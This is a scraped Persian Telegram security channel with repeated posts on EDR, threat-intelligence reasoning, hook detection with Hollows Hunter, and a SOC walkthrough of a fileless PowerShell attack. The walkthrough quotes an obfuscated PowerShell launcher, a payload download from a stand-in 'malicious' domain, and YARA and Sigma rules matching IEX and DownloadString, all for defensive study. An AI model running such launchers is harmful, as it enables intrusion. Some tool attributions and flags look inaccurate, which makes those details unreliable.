یک اشتباهی که رایج شده استفاده از Wazuh بعنوان EDR است .
اما اون یک EDR نیست
https://www.edr-telemetry.com/eligibility.html
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اما اون یک EDR نیست
https://www.edr-telemetry.com/eligibility.html
Please open Telegram to view this post
VIEW IN TELEGRAM
با من با زبان استدلال سخن بگوی!!
گامی در تقویت استدلال منطقی.
🟣تفاوت اساسی بین همبستگی (Correlation) و علیت (Causation)
در هوش تهدیدات سایبری (Cyber Threat Intelligence - CTI)
۱. همبستگی (Correlation)
همبستگی به این معنی است که بین دو متغیر یا دو رویداد، نوعی ارتباط آماری وجود دارد، اما لزوماً یکی باعث وقوع دیگری نمیشود. در دنیای CTI، ممکن است مشاهده کنیم که دو نوع حمله سایبری در یک بازه زمانی خاص رخ دادهاند، اما این به این معنی نیست که یکی باعث دیگری شده است.
🔶مثال در CTI:
فرض کنید در یک بازه زمانی مشخص، تعداد حملات فیشینگ افزایش یافته و در همان دوره تعداد حملات بدافزاری نیز بیشتر شده است. این دو رویداد با هم همبستگی دارند، اما ممکن است هیچ رابطه علّی مستقیمی بین آنها وجود نداشته باشد. شاید یک عامل مشترک (مثل تعطیلات یا یک کمپین جدید هکری) باعث افزایش هر دو شده باشد.
۲. علیت (Causation)
علیت به این معنی است که یک رویداد مستقیماً علت رویداد دیگری است. در CTI، اگر بتوانیم نشان دهیم که یک حمله سایبری خاص مستقیماً باعث نقض امنیتی یا رخنه داده شده است، این یک رابطه علّی است.
🔶مثال در CTI:
اگر بررسی کنیم که یک ایمیل فیشینگ حاوی بدافزار، باعث آلوده شدن سیستم و در نتیجه استخراج اطلاعات حساس شده است، این یک رابطه علّی محسوب میشود. یعنی حمله فیشینگ مستقیماً منجر به آلودگی و سرقت اطلاعات شده است.
🔴چرا این تفاوت در CTI مهم است؟
✔️تصمیمگیری درست: اگر صرفاً بر همبستگی تکیه کنیم، ممکن است اقدامات امنیتی نادرستی انجام دهیم، چون فکر میکنیم دو رویداد به هم مرتبط هستند، در حالی که اینطور نیست.
✔️تشخیص دقیق تهدیدات: تحلیلگران CTI باید بتوانند مشخص کنند که آیا یک عامل تهدید مستقیماً باعث یک حمله شده یا صرفاً رویدادهای مشابهی در یک زمان رخ دادهاند.
✔️بهبود پاسخ به تهدیدات: درک علیت به تیمهای امنیتی کمک میکند که روی ریشه مشکل تمرکز کنند، به جای اینکه منابع خود را روی شاخصهای صرفاً همبسته هدر دهند.
به طور خلاصه، همبستگی نشان میدهد که دو رویداد با هم مرتبط هستند، اما علیت نشان میدهد که یک رویداد علت وقوع رویداد دیگر است. در تحلیل تهدیدات سایبری، باید مراقب باشیم که صرفاً بر همبستگی تکیه نکنیم و تا حد امکان روابط علّی را کشف کنیم.
=============================
🔵سناریو
۱: همبستگی (Correlation)
فرض کنید تیم امنیتی یک بانک در حال تحلیل لاگهای امنیتی است و متوجه میشود که افزایش درخواستهای لاگین ناموفق (Failed Login Attempts) با افزایش ترافیک غیرعادی به سرورهای بانک همزمان شده است.
🔍 تحلیل اولیه:
ممکن است این دو رویداد با هم همبستگی داشته باشند.
اما آیا حملات لاگین ناموفق علت افزایش ترافیک غیرعادی است؟ هنوز مشخص نیست!
احتمال دارد هر دو به دلیل یک عامل خارجی مثل حمله گسترده باتنت یا کمپین حمله هماهنگ رخ داده باشند.
🟧 اشتباه رایج: اگر تیم امنیتی بدون بررسی بیشتر فرض کند که این حملات لاگین ناموفق علت اصلی افزایش ترافیک است، ممکن است منابع خود را روی اشتباهات کاربران متمرکز کند و حمله واقعی (مثلاً اسکن گسترده پورتها توسط یک باتنت) را نادیده بگیرد.
سناریو ۲: علیت (Causation)
تیم امنیتی بررسی بیشتری انجام میدهد و با تحلیل رفتار مهاجم (TTPs - Tactics, Techniques, and Procedures) متوجه میشود که افزایش تلاشهای ناموفق لاگین ناشی از یک حمله Brute Force روی RDP سرورها بوده است. پس از آن، یک لاگین موفق مشکوک از یک آدرس IP ناشناس رخ داده که منجر به اجرای یک بدافزار و استخراج دادهها شده است.
🔍 تحلیل فنی:
بررسی لاگها نشان میدهد که پس از چندین تلاش لاگین ناموفق، یک تلاش موفق از همان IP انجام شده است.
لاگین موفق باعث اجرای یک PowerShell Script مشکوک شده که از سرور C2 (Command & Control) دستور میگیرد.
این اسکریپت در نهایت به دزدیده شدن اطلاعات حساس مشتریان بانک منجر شده است.
✅ نتیجه: در اینجا، یک رابطه علّی (Causation) تایید شده است:
حمله Brute Force منجر به یک لاگین موفق شد.
پس از لاگین، اسکریپت مخرب اجرا شد.
اجرای اسکریپت باعث استخراج دادهها شد.
**استدلال منطقی و تفکر نقادانه یکی از مهارت های مهم در امنیت سایبری است.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
گامی در تقویت استدلال منطقی.
🟣تفاوت اساسی بین همبستگی (Correlation) و علیت (Causation)
در هوش تهدیدات سایبری (Cyber Threat Intelligence - CTI)
۱. همبستگی (Correlation)
همبستگی به این معنی است که بین دو متغیر یا دو رویداد، نوعی ارتباط آماری وجود دارد، اما لزوماً یکی باعث وقوع دیگری نمیشود. در دنیای CTI، ممکن است مشاهده کنیم که دو نوع حمله سایبری در یک بازه زمانی خاص رخ دادهاند، اما این به این معنی نیست که یکی باعث دیگری شده است.
🔶مثال در CTI:
فرض کنید در یک بازه زمانی مشخص، تعداد حملات فیشینگ افزایش یافته و در همان دوره تعداد حملات بدافزاری نیز بیشتر شده است. این دو رویداد با هم همبستگی دارند، اما ممکن است هیچ رابطه علّی مستقیمی بین آنها وجود نداشته باشد. شاید یک عامل مشترک (مثل تعطیلات یا یک کمپین جدید هکری) باعث افزایش هر دو شده باشد.
۲. علیت (Causation)
علیت به این معنی است که یک رویداد مستقیماً علت رویداد دیگری است. در CTI، اگر بتوانیم نشان دهیم که یک حمله سایبری خاص مستقیماً باعث نقض امنیتی یا رخنه داده شده است، این یک رابطه علّی است.
🔶مثال در CTI:
اگر بررسی کنیم که یک ایمیل فیشینگ حاوی بدافزار، باعث آلوده شدن سیستم و در نتیجه استخراج اطلاعات حساس شده است، این یک رابطه علّی محسوب میشود. یعنی حمله فیشینگ مستقیماً منجر به آلودگی و سرقت اطلاعات شده است.
🔴چرا این تفاوت در CTI مهم است؟
✔️تصمیمگیری درست: اگر صرفاً بر همبستگی تکیه کنیم، ممکن است اقدامات امنیتی نادرستی انجام دهیم، چون فکر میکنیم دو رویداد به هم مرتبط هستند، در حالی که اینطور نیست.
✔️تشخیص دقیق تهدیدات: تحلیلگران CTI باید بتوانند مشخص کنند که آیا یک عامل تهدید مستقیماً باعث یک حمله شده یا صرفاً رویدادهای مشابهی در یک زمان رخ دادهاند.
✔️بهبود پاسخ به تهدیدات: درک علیت به تیمهای امنیتی کمک میکند که روی ریشه مشکل تمرکز کنند، به جای اینکه منابع خود را روی شاخصهای صرفاً همبسته هدر دهند.
به طور خلاصه، همبستگی نشان میدهد که دو رویداد با هم مرتبط هستند، اما علیت نشان میدهد که یک رویداد علت وقوع رویداد دیگر است. در تحلیل تهدیدات سایبری، باید مراقب باشیم که صرفاً بر همبستگی تکیه نکنیم و تا حد امکان روابط علّی را کشف کنیم.
=============================
🔵سناریو
۱: همبستگی (Correlation)
فرض کنید تیم امنیتی یک بانک در حال تحلیل لاگهای امنیتی است و متوجه میشود که افزایش درخواستهای لاگین ناموفق (Failed Login Attempts) با افزایش ترافیک غیرعادی به سرورهای بانک همزمان شده است.
🔍 تحلیل اولیه:
ممکن است این دو رویداد با هم همبستگی داشته باشند.
اما آیا حملات لاگین ناموفق علت افزایش ترافیک غیرعادی است؟ هنوز مشخص نیست!
احتمال دارد هر دو به دلیل یک عامل خارجی مثل حمله گسترده باتنت یا کمپین حمله هماهنگ رخ داده باشند.
🟧 اشتباه رایج: اگر تیم امنیتی بدون بررسی بیشتر فرض کند که این حملات لاگین ناموفق علت اصلی افزایش ترافیک است، ممکن است منابع خود را روی اشتباهات کاربران متمرکز کند و حمله واقعی (مثلاً اسکن گسترده پورتها توسط یک باتنت) را نادیده بگیرد.
سناریو ۲: علیت (Causation)
تیم امنیتی بررسی بیشتری انجام میدهد و با تحلیل رفتار مهاجم (TTPs - Tactics, Techniques, and Procedures) متوجه میشود که افزایش تلاشهای ناموفق لاگین ناشی از یک حمله Brute Force روی RDP سرورها بوده است. پس از آن، یک لاگین موفق مشکوک از یک آدرس IP ناشناس رخ داده که منجر به اجرای یک بدافزار و استخراج دادهها شده است.
🔍 تحلیل فنی:
بررسی لاگها نشان میدهد که پس از چندین تلاش لاگین ناموفق، یک تلاش موفق از همان IP انجام شده است.
لاگین موفق باعث اجرای یک PowerShell Script مشکوک شده که از سرور C2 (Command & Control) دستور میگیرد.
این اسکریپت در نهایت به دزدیده شدن اطلاعات حساس مشتریان بانک منجر شده است.
✅ نتیجه: در اینجا، یک رابطه علّی (Causation) تایید شده است:
حمله Brute Force منجر به یک لاگین موفق شد.
پس از لاگین، اسکریپت مخرب اجرا شد.
اجرای اسکریپت باعث استخراج دادهها شد.
**استدلال منطقی و تفکر نقادانه یکی از مهارت های مهم در امنیت سایبری است.
Please open Telegram to view this post
VIEW IN TELEGRAM
همه چیز را با امنیت بیاورید در سازمان
کوبرنتیز و امنیت
https://www.armosec.io/blog/kubernetes-security-best-practices/?utm_source=chatgpt.com
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
کوبرنتیز و امنیت
https://www.armosec.io/blog/kubernetes-security-best-practices/?utm_source=chatgpt.com
Please open Telegram to view this post
VIEW IN TELEGRAM
ARMO
Kubernetes Security Best Practices + Checklist
Enhance your Kubernetes security with our definitive guide for security professionals. Discover best practices and to protect your infrastructure.
🟣تمرین :کشف هوک
همونطور که گفتم بدافزارهایی مابین تماس برنامه ها با سیستم عامل قرار میگیرند به این میگویند هوک کردن . از این طریق اقدام به شنود و تغییر رفتار و اعمال برنامه اصلی میکنند.
✔️حالا بیایید تمرین عملی با ابزار داشته باشیم
مثال استفاده از ابزار Hollows Hunter برای تشخیص API Hooking و تزریق کد
ابزار Hollows Hunter ابزاری از Nektra است که برای تشخیص تزریق کد، Hooking و دستکاری در حافظه پردازشها استفاده میشود. این ابزار میتواند روشهایی مانند Inline Hooking، DLL Injection، Hollow Process Injection و Patch کردن کدهای حافظه را شناسایی کند.
۱. دانلود و اجرای Hollows Hunter
ابتدا ابزار را از Nektra دانلود کنید.
نسخه GUI (گرافیکی) و CLI (خط فرمان) موجود است.
در این مثال از نسخه CLI استفاده میکنیم.
۲. اسکن کردن تمام پردازشهای در حال اجرا
یک روش رایج برای تشخیص API Hooking، بررسی همه پردازشها برای یافتن کدهای تغییر یافته است.
دستور زیر را در CMD با دسترسی Administrator اجرا کنید:
HollowsHunter.exe /all
این دستور همه پردازشهای در حال اجرا را اسکن کرده و اگر Hooking یا تزریق کد وجود داشته باشد، گزارش میدهد.
۳. بررسی یک پردازش خاص
برای اسکن یک پردازش خاص (مثلاً explorer.exe)، میتوانید از PID یا نام آن استفاده کنید:
HollowsHunter.exe /pid 1234
یا
HollowsHunter.exe /proc explorer.exe
اگر پردازش موردنظر Hook شده باشد، ابزار گزارشی مانند زیر نمایش میدهد:
[!] Process explorer.exe (PID 1234) has modified memory regions!
[!] Suspicious injection detected at address 0x7FFXXXXXXX
۴. بررسی DLLهای بارگذاریشده برای Hooking
برای تشخیص DLL Injection و بررسی تغییرات در کتابخانههای بارگذاریشده:
HollowsHunter.exe /hooks
این دستور بررسی میکند که آیا توابع سیستمعامل مانند ntdll.dll و kernel32.dll تغییر کردهاند یا نه. اگر تغییری وجود داشته باشد، گزارش میدهد که این DLLها Hook شدهاند.
۵. ذخیره گزارش برای بررسی دقیقتر
برای ذخیره خروجی در یک فایل (برای بررسی بیشتر یا ارسال به تیم تحلیل )، میتوانید از این دستور استفاده کنید:
HollowsHunter.exe /all /json report.json
این دستور خروجی را در قالب JSON ذخیره میکند که برای تحلیل بیشتر قابل استفاده است.
۶. حذف فرآیندهای مشکوک
اگر ابزار نشانههایی از Hooking یا تزریق کد پیدا کند، میتوان پردازش را بهصورت دستی متوقف کرد:
taskkill /PID 1234 /F
اما دقت کنید: قبل از بستن یک پردازش، باید مطمئن شوید که پردازش مخرب است، زیرا برخی از ابزارهای امنیتی ممکن است بهطور طبیعی از Hooking استفاده کنند.
🔰جمعبندی
✅ابزار Hollows Hunter یک ابزار قدرتمند برای تحلیل حافظه و کشف Hooking است.
✅ میتوان از آن برای تشخیص Inline Hooking، DLL Injection و تغییرات در حافظه APIها استفاده کرد.
✅ با استفاده از CLI، میتوان خروجی را در فرمت JSON ذخیره و بررسی کرد.
✅ این ابزار برای تحلیل بدافزار، Threat Hunting و Forensics بسیار مفید است.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
همونطور که گفتم بدافزارهایی مابین تماس برنامه ها با سیستم عامل قرار میگیرند به این میگویند هوک کردن . از این طریق اقدام به شنود و تغییر رفتار و اعمال برنامه اصلی میکنند.
✔️حالا بیایید تمرین عملی با ابزار داشته باشیم
مثال استفاده از ابزار Hollows Hunter برای تشخیص API Hooking و تزریق کد
ابزار Hollows Hunter ابزاری از Nektra است که برای تشخیص تزریق کد، Hooking و دستکاری در حافظه پردازشها استفاده میشود. این ابزار میتواند روشهایی مانند Inline Hooking، DLL Injection، Hollow Process Injection و Patch کردن کدهای حافظه را شناسایی کند.
۱. دانلود و اجرای Hollows Hunter
ابتدا ابزار را از Nektra دانلود کنید.
نسخه GUI (گرافیکی) و CLI (خط فرمان) موجود است.
در این مثال از نسخه CLI استفاده میکنیم.
۲. اسکن کردن تمام پردازشهای در حال اجرا
یک روش رایج برای تشخیص API Hooking، بررسی همه پردازشها برای یافتن کدهای تغییر یافته است.
دستور زیر را در CMD با دسترسی Administrator اجرا کنید:
HollowsHunter.exe /all
این دستور همه پردازشهای در حال اجرا را اسکن کرده و اگر Hooking یا تزریق کد وجود داشته باشد، گزارش میدهد.
۳. بررسی یک پردازش خاص
برای اسکن یک پردازش خاص (مثلاً explorer.exe)، میتوانید از PID یا نام آن استفاده کنید:
HollowsHunter.exe /pid 1234
یا
HollowsHunter.exe /proc explorer.exe
اگر پردازش موردنظر Hook شده باشد، ابزار گزارشی مانند زیر نمایش میدهد:
[!] Process explorer.exe (PID 1234) has modified memory regions!
[!] Suspicious injection detected at address 0x7FFXXXXXXX
۴. بررسی DLLهای بارگذاریشده برای Hooking
برای تشخیص DLL Injection و بررسی تغییرات در کتابخانههای بارگذاریشده:
HollowsHunter.exe /hooks
این دستور بررسی میکند که آیا توابع سیستمعامل مانند ntdll.dll و kernel32.dll تغییر کردهاند یا نه. اگر تغییری وجود داشته باشد، گزارش میدهد که این DLLها Hook شدهاند.
۵. ذخیره گزارش برای بررسی دقیقتر
برای ذخیره خروجی در یک فایل (برای بررسی بیشتر یا ارسال به تیم تحلیل )، میتوانید از این دستور استفاده کنید:
HollowsHunter.exe /all /json report.json
این دستور خروجی را در قالب JSON ذخیره میکند که برای تحلیل بیشتر قابل استفاده است.
۶. حذف فرآیندهای مشکوک
اگر ابزار نشانههایی از Hooking یا تزریق کد پیدا کند، میتوان پردازش را بهصورت دستی متوقف کرد:
taskkill /PID 1234 /F
اما دقت کنید: قبل از بستن یک پردازش، باید مطمئن شوید که پردازش مخرب است، زیرا برخی از ابزارهای امنیتی ممکن است بهطور طبیعی از Hooking استفاده کنند.
🔰جمعبندی
✅ابزار Hollows Hunter یک ابزار قدرتمند برای تحلیل حافظه و کشف Hooking است.
✅ میتوان از آن برای تشخیص Inline Hooking، DLL Injection و تغییرات در حافظه APIها استفاده کرد.
✅ با استفاده از CLI، میتوان خروجی را در فرمت JSON ذخیره و بررسی کرد.
✅ این ابزار برای تحلیل بدافزار، Threat Hunting و Forensics بسیار مفید است.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
𝗜𝗻𝗰𝗶𝗱𝗲𝗻𝘁_𝗥𝗲𝘀𝗽𝗼𝗻𝘀𝗲_𝗣𝗹𝗮𝗻𝗻𝗶𝗻𝗴.pdf
1.6 MB
یکی از نشانه های پیشرفت وجود اسناد خوش نگارش فنی هست
از استرالیا بخوانیم
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
از استرالیا بخوانیم
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🤩1👨💻1
🟣تمرین :کشف هوک
همونطور که گفتم بدافزارهایی مابین تماس برنامه ها با سیستم عامل قرار میگیرند به این میگویند هوک کردن . از این طریق اقدام به شنود و تغییر رفتار و اعمال برنامه اصلی میکنند.
✔️حالا بیایید تمرین عملی با ابزار داشته باشیم
مثال استفاده از ابزار Hollows Hunter برای تشخیص API Hooking و تزریق کد
ابزار Hollows Hunter ابزاری از Nektra است که برای تشخیص تزریق کد، Hooking و دستکاری در حافظه پردازشها استفاده میشود. این ابزار میتواند روشهایی مانند Inline Hooking، DLL Injection، Hollow Process Injection و Patch کردن کدهای حافظه را شناسایی کند.
۱. دانلود و اجرای Hollows Hunter
ابتدا ابزار را از Nektra دانلود کنید.
نسخه GUI (گرافیکی) و CLI (خط فرمان) موجود است.
در این مثال از نسخه CLI استفاده میکنیم.
۲. اسکن کردن تمام پردازشهای در حال اجرا
یک روش رایج برای تشخیص API Hooking، بررسی همه پردازشها برای یافتن کدهای تغییر یافته است.
دستور زیر را در CMD با دسترسی Administrator اجرا کنید:
HollowsHunter.exe /all
این دستور همه پردازشهای در حال اجرا را اسکن کرده و اگر Hooking یا تزریق کد وجود داشته باشد، گزارش میدهد.
۳. بررسی یک پردازش خاص
برای اسکن یک پردازش خاص (مثلاً explorer.exe)، میتوانید از PID یا نام آن استفاده کنید:
HollowsHunter.exe /pid 1234
یا
HollowsHunter.exe /proc explorer.exe
اگر پردازش موردنظر Hook شده باشد، ابزار گزارشی مانند زیر نمایش میدهد:
[!] Process explorer.exe (PID 1234) has modified memory regions!
[!] Suspicious injection detected at address 0x7FFXXXXXXX
۴. بررسی DLLهای بارگذاریشده برای Hooking
برای تشخیص DLL Injection و بررسی تغییرات در کتابخانههای بارگذاریشده:
HollowsHunter.exe /hooks
این دستور بررسی میکند که آیا توابع سیستمعامل مانند ntdll.dll و kernel32.dll تغییر کردهاند یا نه. اگر تغییری وجود داشته باشد، گزارش میدهد که این DLLها Hook شدهاند.
۵. ذخیره گزارش برای بررسی دقیقتر
برای ذخیره خروجی در یک فایل (برای بررسی بیشتر یا ارسال به تیم تحلیل )، میتوانید از این دستور استفاده کنید:
HollowsHunter.exe /all /json report.json
این دستور خروجی را در قالب JSON ذخیره میکند که برای تحلیل بیشتر قابل استفاده است.
۶. حذف فرآیندهای مشکوک
اگر ابزار نشانههایی از Hooking یا تزریق کد پیدا کند، میتوان پردازش را بهصورت دستی متوقف کرد:
taskkill /PID 1234 /F
اما دقت کنید: قبل از بستن یک پردازش، باید مطمئن شوید که پردازش مخرب است، زیرا برخی از ابزارهای امنیتی ممکن است بهطور طبیعی از Hooking استفاده کنند.
🔰جمعبندی
✅ابزار Hollows Hunter یک ابزار قدرتمند برای تحلیل حافظه و کشف Hooking است.
✅ میتوان از آن برای تشخیص Inline Hooking، DLL Injection و تغییرات در حافظه APIها استفاده کرد.
✅ با استفاده از CLI، میتوان خروجی را در فرمت JSON ذخیره و بررسی کرد.
✅ این ابزار برای تحلیل بدافزار، Threat Hunting و Forensics بسیار مفید است.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
همونطور که گفتم بدافزارهایی مابین تماس برنامه ها با سیستم عامل قرار میگیرند به این میگویند هوک کردن . از این طریق اقدام به شنود و تغییر رفتار و اعمال برنامه اصلی میکنند.
✔️حالا بیایید تمرین عملی با ابزار داشته باشیم
مثال استفاده از ابزار Hollows Hunter برای تشخیص API Hooking و تزریق کد
ابزار Hollows Hunter ابزاری از Nektra است که برای تشخیص تزریق کد، Hooking و دستکاری در حافظه پردازشها استفاده میشود. این ابزار میتواند روشهایی مانند Inline Hooking، DLL Injection، Hollow Process Injection و Patch کردن کدهای حافظه را شناسایی کند.
۱. دانلود و اجرای Hollows Hunter
ابتدا ابزار را از Nektra دانلود کنید.
نسخه GUI (گرافیکی) و CLI (خط فرمان) موجود است.
در این مثال از نسخه CLI استفاده میکنیم.
۲. اسکن کردن تمام پردازشهای در حال اجرا
یک روش رایج برای تشخیص API Hooking، بررسی همه پردازشها برای یافتن کدهای تغییر یافته است.
دستور زیر را در CMD با دسترسی Administrator اجرا کنید:
HollowsHunter.exe /all
این دستور همه پردازشهای در حال اجرا را اسکن کرده و اگر Hooking یا تزریق کد وجود داشته باشد، گزارش میدهد.
۳. بررسی یک پردازش خاص
برای اسکن یک پردازش خاص (مثلاً explorer.exe)، میتوانید از PID یا نام آن استفاده کنید:
HollowsHunter.exe /pid 1234
یا
HollowsHunter.exe /proc explorer.exe
اگر پردازش موردنظر Hook شده باشد، ابزار گزارشی مانند زیر نمایش میدهد:
[!] Process explorer.exe (PID 1234) has modified memory regions!
[!] Suspicious injection detected at address 0x7FFXXXXXXX
۴. بررسی DLLهای بارگذاریشده برای Hooking
برای تشخیص DLL Injection و بررسی تغییرات در کتابخانههای بارگذاریشده:
HollowsHunter.exe /hooks
این دستور بررسی میکند که آیا توابع سیستمعامل مانند ntdll.dll و kernel32.dll تغییر کردهاند یا نه. اگر تغییری وجود داشته باشد، گزارش میدهد که این DLLها Hook شدهاند.
۵. ذخیره گزارش برای بررسی دقیقتر
برای ذخیره خروجی در یک فایل (برای بررسی بیشتر یا ارسال به تیم تحلیل )، میتوانید از این دستور استفاده کنید:
HollowsHunter.exe /all /json report.json
این دستور خروجی را در قالب JSON ذخیره میکند که برای تحلیل بیشتر قابل استفاده است.
۶. حذف فرآیندهای مشکوک
اگر ابزار نشانههایی از Hooking یا تزریق کد پیدا کند، میتوان پردازش را بهصورت دستی متوقف کرد:
taskkill /PID 1234 /F
اما دقت کنید: قبل از بستن یک پردازش، باید مطمئن شوید که پردازش مخرب است، زیرا برخی از ابزارهای امنیتی ممکن است بهطور طبیعی از Hooking استفاده کنند.
🔰جمعبندی
✅ابزار Hollows Hunter یک ابزار قدرتمند برای تحلیل حافظه و کشف Hooking است.
✅ میتوان از آن برای تشخیص Inline Hooking، DLL Injection و تغییرات در حافظه APIها استفاده کرد.
✅ با استفاده از CLI، میتوان خروجی را در فرمت JSON ذخیره و بررسی کرد.
✅ این ابزار برای تحلیل بدافزار، Threat Hunting و Forensics بسیار مفید است.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
تحلیل روز بخوانیم
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
Please open Telegram to view this post
VIEW IN TELEGRAM
eSentire
MintsLoader: StealC and BOINC Delivery
In early January 2025, the eSentire Threat Response Unit (TRU) identified an ongoing campaign involving MintsLoader delivering second stage payloads like…
تزریق در صفحات بازدیدی کاربران
مقاله ترند میکرو
https://www.trendmicro.com/en_us/research/25/b/chinese-speaking-group-manipulates-seo-with-badiis.html
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
مقاله ترند میکرو
https://www.trendmicro.com/en_us/research/25/b/chinese-speaking-group-manipulates-seo-with-badiis.html
Please open Telegram to view this post
VIEW IN TELEGRAM
Trend Micro
Chinese-Speaking Group Manipulates SEO with BadIIS
This blog post details our analysis of an SEO manipulation campaign targeting Asia. We also share recommendations that can help enterprises proactively secure their environment.
👍1
مقاله اسپلانک برای کشف
https://www.splunk.com/en_us/blog/security/fantastic-iis-modules-and-how-to-find-them.html
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://www.splunk.com/en_us/blog/security/fantastic-iis-modules-and-how-to-find-them.html
Please open Telegram to view this post
VIEW IN TELEGRAM
Splunk
Fantastic IIS Modules and How to Find Them | Splunk
This blog showcases how to enable and ingest IIS operational logs, utilize PowerShell noscripted inputs to ingest installed modules and simulate AppCmd and PowerShell adding new IIS modules and disable HTTP logging using Atomic Red Team.
❤1👍1🔥1
نقش ها و مسوولیت ها در تیم CTI
https://readmedium.com/the-cti-team-roles-and-responsibilities-you-need-bdd3c03f781e
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://readmedium.com/the-cti-team-roles-and-responsibilities-you-need-bdd3c03f781e
Please open Telegram to view this post
VIEW IN TELEGRAM
Readmedium
The CTI Team: Roles and Responsibilities You Need
Discover the key roles and responsibilities required to build a successful cyber threat intelligence team.
❤1👍1🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1👏1
PowerShell_Threat_Hunting_Obfuscation_Detection_via_Standard_Deviation.wav
48 MB
پادکستی که توسط NotebookLM گوگل برای لینک زیر تولید شد
https://medium.com/@manuel.arrieta_34860/powershell-threat-hunting-identifying-obfuscation-using-standard-deviation-9b2d9f53697f
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://medium.com/@manuel.arrieta_34860/powershell-threat-hunting-identifying-obfuscation-using-standard-deviation-9b2d9f53697f
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1🕊1
Backscatter_for_Threat_Hunting_Malware_Configuration_Analysis.wav
57 MB
پادکستی که توسط NotebookLM گوگل برای لینک زیر تولید شد
https://www.googlecloudcommunity.com/gc/Community-Blog/Consuming-Backscatter-Information-to-Perform-Threat-Hunting/ba-p/863828
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
https://www.googlecloudcommunity.com/gc/Community-Blog/Consuming-Backscatter-Information-to-Perform-Threat-Hunting/ba-p/863828
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1👏1
شناسایی حمله از طریق پاورشل
به همراه اقدامات برای هانت
🟣بررسی یک حمله دم دستی
امروز میخوام بجای یک ایده جدید ، یه حمله تیپیکال که در SOC میبینید رو با هم مرور کنیم.
📌 سناریو:
یک مهاجم از طریق PowerShell اقدام به اجرای یک fileless attack در شبکه سازمان کرده است. SOC یک هشدار دریافت کرده که نشان میدهد یک فرآیند مشکوک PowerShell با پارامترهای مبهمسازیشده (obfuscated) اجرا شده است.
🔆هدف ما:
شناسایی حمله با بررسی لاگهای PowerShell.
بررسی ارتباطات شبکهای مخرب.
استخراج payload مخرب از حافظه.
تحلیل بدافزار و روشهای آن.
ارائه راهکارهای مقابله و همچنین شکار تهدید برای جلوگیری از حملات مشابه در آینده و کشف های جدید
🔍 ۱. بررسی اولیه هشدار و کشف فرآیند مشکوک
فرآیند powershell.exe با پارامترهای زیر اجرا شده است:
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgA
این مقدار Base64 encoded است. برای رمزگشایی، در PowerShell دستور زیر را اجرا میکنیم:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SQBFAFgA"))
📌 نتیجه: این مقدار به دستور Invoke-Expression (IEX) تبدیل میشود، که نشانهای از اجرای یک کد از راه دور است.
🔍 ۲. جستجوی فرآیندهای مشکوک در اسپلانک
index=windows EventCode=4104 | search "IEX(" OR "DownloadString(" OR "Convert.FromBase64String("
📌 نتیجه: مشاهده چندین اجرای مشکوک از PowerShell همراه با DownloadString که نشاندهنده دانلود payload از اینترنت است.
🔍 ۳. بررسی ارتباطات شبکهای مشکوک
برای بررسی اینکه PowerShell به چه دامنههایی متصل شده، از netstat استفاده میکنیم:
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -like "*.*.*.*" }
📌 نتیجه: مشاهده یک ارتباط به http://malicious[.]domain/payload.ps1
✅ گام بعدی: استفاده از Wireshark برای مشاهده ترافیک HTTP و استخراج دادهها:
http.request.full_uri contains "malicious[.]domain"
📌 نتیجه: مهاجم در حال دانلود یک payload مخرب است.
🔍 ۴. استخراج کد مخرب از حافظه برای تحلیل بیشتر
از ابزار Volatility برای بررسی فرآیند powershell.exe و استخراج کد استفاده میکنیم:
volatility -f memory.dmp --profile=Win10x64 procdump -p 1234 -D output/
📌 نتیجه: مشاهده کدی که در حافظه لود شده است. این کد شامل یک Reflective DLL Injection میباشد.
🔹 آنالیز بیشتر با YARA برای بررسی رفتار کد استخراجشده:
rule Suspicious_PowerShell {
meta:
denoscription = "Detects obfuscated PowerShell payloads"
strings:
$a = "IEX("
$b = "DownloadString"
$c = "System.Reflection.Assembly::Load"
condition:
any of ($a,$b,$c)
}
📌 نتیجه: این کد دارای قابلیت اجرای Reflective DLL Injection است، که در حملات APT بهکار میرود.
🔍 ۵. تحلیل پیشرفتهتر با Sysmon برای شناسایی رفتار مهاجم
ابزار Sysmon یکی از بهترین ابزارها برای شکار رفتارهای مخرب PowerShell است. برای بررسی، از sysmon -c خروجی میگیریم:
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Select-String "powershell.exe"
📌 نتیجه: مشاهده Event ID 1 (Process Creation) که نشان میدهد PowerShell با پارامترهای مشکوک اجرا شده است.
✅ گام بعدی:
ساخت یک قانون Sigma برای شناسایی اجرای مشابه در آینده:
noscript: Suspicious PowerShell Execution
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- "NoP -NonI -ExecutionPolicy Bypass"
- "IEX("
- "DownloadString("
condition: selection
📌 مزیت:
🚨 هر زمان که دستورات مشابه اجرا شود، یک هشدار در SIEM ایجاد خواهد شد.
🎯 نتیجهگیری و اقدامات برای جلوگیری از حملات مشابه
✅ اقدامات شکار تهدید (Threat Hunting Actions)
✔️ مانیتورینگ Event ID 4104 در SIEM برای شناسایی اجرای اسکریپتهای مشکوک.
✔️ تحلیل ارتباطات شبکهای با Wireshark برای تشخیص دامنههای مخرب.
